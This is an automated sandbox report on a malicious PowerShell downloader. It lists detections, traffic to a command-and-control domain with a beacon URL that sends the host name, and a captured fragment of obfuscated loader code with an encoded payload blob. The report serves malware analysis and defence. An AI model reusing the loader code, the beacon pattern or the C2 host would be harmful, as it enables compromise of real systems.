Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:	download.ps1
Analysis ID:	1561509
MD5:	5ba58271503fe53a244fc74172ea33c7
SHA1:	74f1632891bf47872873ab34053b49e015ee6921
SHA256:	f801217a2f1f7e2677a39476875b8b5cdb8b41dea3fe7255a3fb9806551b78c5
Tags:	KongTukeps1user-monitorsg
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Suricata IDS alerts for network traffic

Loading BitLocker PowerShell Module

Queries Google from non browser process on port 80

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6392, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6392, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE TA582 Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T16:11:58.680285+0100	2859125	1	Domain Observed Used for C2 Detected	192.168.2.5	52208	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://bkkeiekjfcdaaen.top/sb5xvzt83whtr.php?id=user-PC&key=125435732625&s=527

Avira URL Cloud: Label: malware

Source:	Binary string: softy.pdbllcen, source: powershell.exe, 00000000.00000002.2181471518.00000202F398B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb> source: powershell.exe, 00000000.00000002.2140984176.00000202DB506000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2140984176.00000202DB480000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ll\mscorlib.pdb`: source: powershell.exe, 00000000.00000002.2181471518.00000202F3838000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2181471518.00000202F38F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdbE-5E7582D8C9FA}\InprocServer328 source: powershell.exe, 00000000.00000002.2140389547.00000202D95A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2140389547.00000202D95A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb$ source: powershell.exe, 00000000.00000002.2184403820.00000202F3C00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2184403820.00000202F3C19000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2181471518.00000202F398B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2181471518.00000202F38F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2140984176.00000202DB4B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb source: powershell.exe, 00000000.00000002.2140984176.00000202DB506000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb\ source: powershell.exe, 00000000.00000002.2184403820.00000202F3C00000.00000004.00000020.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2859125 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.5:52208 -> 1.1.1.1:53

Queries Google from non browser process on port 80

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 168.100.10.140 168.100.10.140

Source: global traffic	HTTP traffic detected: GET /sb5xvzt83whtr.php?id=user-PC&key=125435732625&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bkkeiekjfcdaaen.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /sb5xvzt83whtr.php?id=user-PC&key=125435732625&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bkkeiekjfcdaaen.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive

Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: bkkeiekjfcdaaen.top
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCBFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://$rb9w1lvtg27jsno/$uys5qoe7i4wbpnv.php?id=$env:computername&key=$siumfg&s=527
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCBFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCE90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bkkeiekjfcdaaen.top
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCBFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bkkeiekjfcdaaen.top/sb5xvzt83whtr.php?id=user-PC&key=125435732625&s=527
Source: powershell.exe, 00000000.00000002.2181227242.00000202F36E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsHG
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2170366524.00000202EB7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB6AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDAA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDD9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDDC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDC12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDDBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDDB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDAA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDDAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDA8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DDDA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2141262045.00000202DB611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCE9B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCE90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2141262045.00000202DB611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DD0B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2170366524.00000202EB6AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2170366524.00000202EB6AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2170366524.00000202EB6AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2141262045.00000202DB838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD0B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2141262045.00000202DCF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2170366524.00000202EB7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB6AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2141262045.00000202DCFCE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD0B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2170366524.00000202EB9EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD0B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2141262045.00000202DD5E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?tab=w1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848F47206	0_2_00007FF848F47206
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848F47FB2	0_2_00007FF848F47FB2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848F3E8D3	0_2_00007FF848F3E8D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF849162BD4	0_2_00007FF849162BD4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF8491A7CDD	0_2_00007FF8491A7CDD

Source: powershell.exe, 00000000.00000002.2140389547.00000202D9590000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBP

Source: classification engine

Classification label: mal72.evad.winPS1@2/7@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t4ou5lqk.a5e.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $6vwn04tdrexkbs8.(([char[]]@((471814/7042),(543900/4900),(727664/6497),(8794-(2783+5890)),(12600/(-1000+(3152150/2741))),(-4816+4927)) -join ''))( $h7gd50vijsqoeay ) $6vwn04tdrexkbs8.(([char[]]@((-414+(9706-(13075-(-1623+5473)))),(-2454+2562),(3429-(5763-(12440160/(3647+(4723-3282))))),(226550/(-3998+(9102-(-5749+8883)))),(-2016+2117)) -join ''))()$ubza4rtvjklqyds.((-join (@((-4153+4220),(1025892/9499),(5732-(14356034/2554)),(1599-1484),(6737-6636))| ForEach-Object { [char]$_ })))()[byte[]] $etrmf4ilod6b93k = $h7gd50vijsqoeay.((-join (@((2533-2449),(4477-4366),(7997-(12266-4334)),(73302/643),(2242-(18130560/(7915080/929))),(54514/(3489-2927)),(5808-5687))| ForEach-Object { [char]$_ })))() $8ntfd3m2szrqjoa=$etrmf4ilod6b93k return $8ntfd3m2szrqjoa}[System.Text.Encoding]::ascii.(([system.String]::new(@((7655-7584),(10207-(53743708/(12300534/(1462+851)))),(-2933+(21153962/(58383270/8415))),(415166/(7352-2350)),(-10129+10245),(10246-10132),(7939-(-1303+(4312664/472))),(7737-(15749-8122)),(8393-(12966-(30459464/6514)))))))((skt9qofx4i6gh3pr2d0l8ae1ujw "J/05d2RlNjllY9D7YfksoBWiqXohvIwloK7G0bmJhRZD63UX2kr0cYbiCjEjo4gVKb8oHXI33U6ujDLAQ04VMvURuuHjq/Te66vW686aZGzMTAMaWYkODpiZ2sfchDK6hwrLm5HO2WdfnJuT2qiSzEOi2bZuzUP4pusPT1/YCkceGoqD5o/AkpfO4U6WnBzbpInCkvuraIXd2VH5x5vDqYGw89iXnbrITA3OgqFqIa6mdNqYTg/Pg5CUAWYcFhcbhYnSCYsYuYoWznCZiOlS/xW/ca48CVhI5fFNp5M+20e7mDvFp4GcQ1qBa3YcjbDc+7cPJAZoZXBMkegoHQGGjzx4aSyOoNGo9YGhzTuTiA2Ghaf6/xnnkxCkrmP4EAIu51rkoH7zS5LMrZZezOSWCi6wodW9obI97UVVKNw1WL6iG+eHyqo6CK2ggQAGtBjk7MOd4xf4ZLQXrPMboAw/9ktfnaGWXuiFe5LTwuCl3OUzGDLIxJfM7C/KuH5oSpVe/5pFjn4fqM7EELqxZO1ye6H7+f6vNck/Ulpf/lih9ye3hn8+bRekqZ8QMeHvMQfWLeLvD5K72urEhAh4ghmfIxrOU0eq9lmJ+AClw9TOB73o2JYWuufEQfLNuYGhbLC1Ew3M8BmXs4q7JIAoMGqLGNLw8wJ29f3EFgrpuLv7CwS80om6BqHTJTgP3eevTNrDJb4PxulAwkB+2gKGZIKozWFtvaXrLLeVIk/nbf6bmJKsX955FZJhDp6FnTfvFrvejNIRpb2qTbwxTeZl+sFYKF1ViHD9LhFM70LUq8vmVxdfcf+mRkmDdv0Y12kzaASGyRreJOrUAIeuFgo4owsCZ+gWRgiKQh8x9GFnIvmujBBgsLSf5A3TJ5YfjfVk13TiX5dTSzbtCH7DGCSJAjtJvZVkCG5oeVbUamw4Ze1mYS10Oa+og0mu6pueiz4uhdK5x4DJlxaS5deKZCKJpQlChVveacGYdNpJZkmMC5QBSUsYHRhbxIL02hufX3rmvhGbVgHDn7qWvdpO2PIpFuhvyhyRToPauEY/Wh4MXFIGedChOjgRDk6Ujfm4y8qC3goQTsmNCFG406TqBg/kSIUE5M/Jdjnw99i2Kc6P0sHjnNE4dx77SoWciYI4Tvn5Pzjtw5Z771/yDNFAOI5/UrzxcVOVp3FJ7R5kWsKuSuRbtv0bm4JbkFmfkXDkE9vX2eiyX1ibU2WuTBgjRft0SmXjI5lNpixMFl3lfyALzvTD4HLViLI7Oomt69oZxsmmRBqQvrzOioaMTF3abMyWTUTcFHIx+qD0EpQzLXkMZ0FnlK98s8xzXz1pGkJDca/aJ/lj41PcCxBYNRTw/+MSPCxezinYIRwzQ7h8ozPpzi69QzpkLeBcSYNftv4nNMD2e9HQE+ZJk5e5tIlS0Xi7tP6uDHlEWfm7/kzQ+K5GUiSBLLBJLZvDckb/Rh6gskoxJzPNxUiak2JWL5dFiGPb6NdWaeclvDQ3uR4DLZoXqC2eH855tTkMFg/RTn6Ztr7xMBjKANcGLH2+YnHIoKrU0LWJKZB5J/FJgyCG0RocOgyh7Eu0ZXgfmxKyXTsu5zryKQ04IMp3z+7Bako7cUmgTtkqIKPL9IIkpLUa6SgikggWRozpGRndlX/E/5Cld51wH+s3es2ND2FBaYhAEEUK6HUQVu5BrFT6K6ddVjx/9TOjHgjTntuGhcc1Ns6CNAVPa0dZCB6DJzcZAwJ0beR0y3Xg1mC+/5bemiv7+OhBFUUh4Pp3BojzdtxV6fgYB0BwJnkHtRT4duUWn0CNK+FCywWu+8gXwCqmyo7qhrMIeRlnE6vkE+eWbgCcZOWTQXlBoanRIecWG/Z8BxLhQk1H

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
